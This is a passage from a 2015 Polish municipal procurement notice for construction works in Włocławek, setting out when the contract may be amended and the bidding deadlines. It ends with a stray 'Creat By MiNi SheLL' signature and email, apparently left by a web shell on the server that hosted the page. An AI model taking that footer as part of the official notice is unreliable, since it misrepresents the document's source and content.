h)	wystąpienie niekorzystnych warunków atmosferycznych, powodujących wstrzymanie lub przerwanie prowadzonych robót budowlanych, stanowiących przedmiot zamówienia - potwierdzonego pisemnie w dzienniku budowy przez inspektora / inspektorów nadzoru inwestorskiego, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi wstrzymania robót budowlanych,
i)	wystąpienie konieczności wstrzymania prowadzonych robót budowlanych, stanowiących przedmiot zamówienia, z powodu odnalezienia niewypałów lub niewybuchów na placu budowy, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi wstrzymania robót budowlanych,
j)	wystąpienie konieczności wprowadzenia w dokumentacji projektowej zmian, powodujących wstrzymanie lub przerwanie prowadzonych robót budowlanych, stanowiących przedmiot zamówienia, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni nie-zbędną do wprowadzenia zmian w dokumentacji projektowej oraz na przeprowadzenie uzgodnień (ustaleń) z właściwymi organami, uzyskanie opinii właściwych organów oraz wy-danie decyzji przez właściwe organy, przy czym wprowadzenie w dokumentacji projektowej tych zmian nie może skutkować zwiększeniem (zmianą) zakresu świadczenia Wykonawcy zawartego w ofercie oraz zwiększeniem wynagrodzenia Wykonawcy,
k)	wystąpienie konieczności przeprowadzenia przez Zamawiającego postępowań o udzielenie zamówienia publicznego na podstawie ustawy - Prawo zamówień publicznych w przetargu nieograniczonego lub przetargu ograniczonego, których przedmiot stanowi realizacja robót nieobjętych przedmiotem niniejszego zamówienia, koniecznych dla realizacji zamówienia podstawowego, ale niewypełniających możliwości skorzystania dla ich realizacji z dyspozycji art. 67 ust. 1 pkt 5 ustawy - Prawo zamówień publicznych (w szczególności będących wynikiem błędów projektowych), mających wpływ na uzgodniony termin zakończenia realizacji prowadzonej inwestycji (powodujących konieczność jego wydłużenia), przy czym przesunięcie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi, w którym nie istniała możliwość wykonywania jakichkolwiek robót,
l)	wstrzymania prowadzonych robót budowlanych przez nadzór archeologiczny z powodu odnalezienia zabytków, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą liczbie dni okresu wstrzymania prowadzonych robót budowlanych; konieczność wstrzymania prowadzonych robót z powodu odnalezienia zabytku (zabytków) powinna zostać potwierdzona wpisem inspektora nadzoru inwestorskiego w Dzienniku Budowy oraz pisemnym zawiadomieniem Zamawiającego przez nadzór archeologiczny,
2)	dokonanie podczas okresu obowiązywania umowy zmiany zgłoszonych przez Wykonawcę osób, z zastrzeżeniem punktu 3;
3)	dokonanie zmiany wynagrodzenia na skutek niewykonania pełnego zakresu robót (roboty zaniechane), przy czym dokonanie zmiany wynagrodzenia jest możliwe po sporządzeniu przez Wykonawcę protokołu robót zaniechanych, zgodnie z cenami wynikającymi z kosztorysów ofertowych, stanowiących integralną część umowy, a następnie jego zaakceptowaniu przez Zamawiającego,
4)	dokonanie zmiany zakresu robót zgłoszonych do podwykonawstwa oraz zmiany podwykonawcy, przy czym dokonanie zmiany zakresu robót zgłoszonych do podwykonawstwa oraz zmiany podwykonawcy jest możliwe wyłącznie pod warunkiem wyrażenia zgody przez Zamawiającego na dokonanie zmiany zakresu robót zgłoszonych do podwykonawstwa lub dokonanie zmiany podwykonawcy,
5)	wprowadzenie robót zamiennych w przypadkach opisanych w punkcie 2,
6)	dokonanie zmiany zakresu robót budowlanych, stanowiących przedmiot zamówienia, na skutek obowiązków, wynikających z decyzji lub uzgodnień uzyskanych po terminie zawarcia;
7)	wprowadzenie zmian, wynikających ze zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy;
8)	zmiana albo rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy - Prawo zamówień publicznych; w takim przypadku, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy - Prawo zamówień publicznych, w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia, poprzez przedstawienie w tym celu odpowiednich dokumentów, potwierdzających spełnianie warunków udziału w postępowaniu,
9)	dokonanie zmiany reprezentantów stron.
2. Konieczność wykonania robót zamiennych, o których mowa w punkcie 1 ppkt 1 lit. g oraz w punkcie 1 ppkt 5, zachodzi w sytuacji, gdy:
1)	materiały budowlane, przewidziane w umowie do wykonania zamówienia, nie mogą być użyte przy realizacji inwestycji z powodu zaprzestania ich produkcji lub zastąpienia ich innymi materiałami budowlanymi,
2)	w trakcie realizacji przedmiotu zamówienia nastąpiła zmiana przepisów prawa budowlanego,
3)	w czasie realizacji budowy zmienią się warunki techniczne wykonania (np. Polska Norma),
4)	w trakcie realizacji przedmiotu zamówienia zastosowano lepsze materiały budowlane bądź inną technologię wykonania robót.
3. W przypadku, o którym mowa w punkcie 1 ppkt 2, zmiana zgłoszonych przez Wykonawcę osób jest możliwa wyłącznie:
1)	jeżeli kwalifikacje tych osób będą takie same lub wyższe od kwalifikacji osób wymaganych postanowieniami specyfikacji istotnych warunków zamówienia, 
2)	po złożeniu przez wyznaczone przez Wykonawcę oraz zaakceptowane przez Zamawiającego osoby pisemnego o świadczenia o przejęciu obowiązków osób, wynikających z art. 22 ustawy - Prawo budowlane, z podaniem dnia przejęcia obowiązków.
4. Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej i podpisania przez obydwie strony umowy, z zastrzeżeniem punktu 6.
5. Z wnioskiem o zmianę treści umowy może wystąpić zarówno Wykonawca, jak i Zamawiający.
6. Ewentualne zmiany, o których mowa w punkcie 1 ppkt 2 i 9, nie wymagają sporządzenia aneksu do umowy, a wyłącznie uzyskania pisemnej zgody Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wloclawek.pl/zamowienia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Włocławek, Biuro Zamówień Publicznych, ul. Kościuszki 12, 87-800 Włocławek; pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2015 godzina 08:30, miejsce: Biuro Obsługi Mieszkańców - stanowisko ds. obsługi kancelaryjnej Prezydenta Miasta Włocławek; Urząd Miasta Włocławek, Zielony Rynek 11/13, 87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com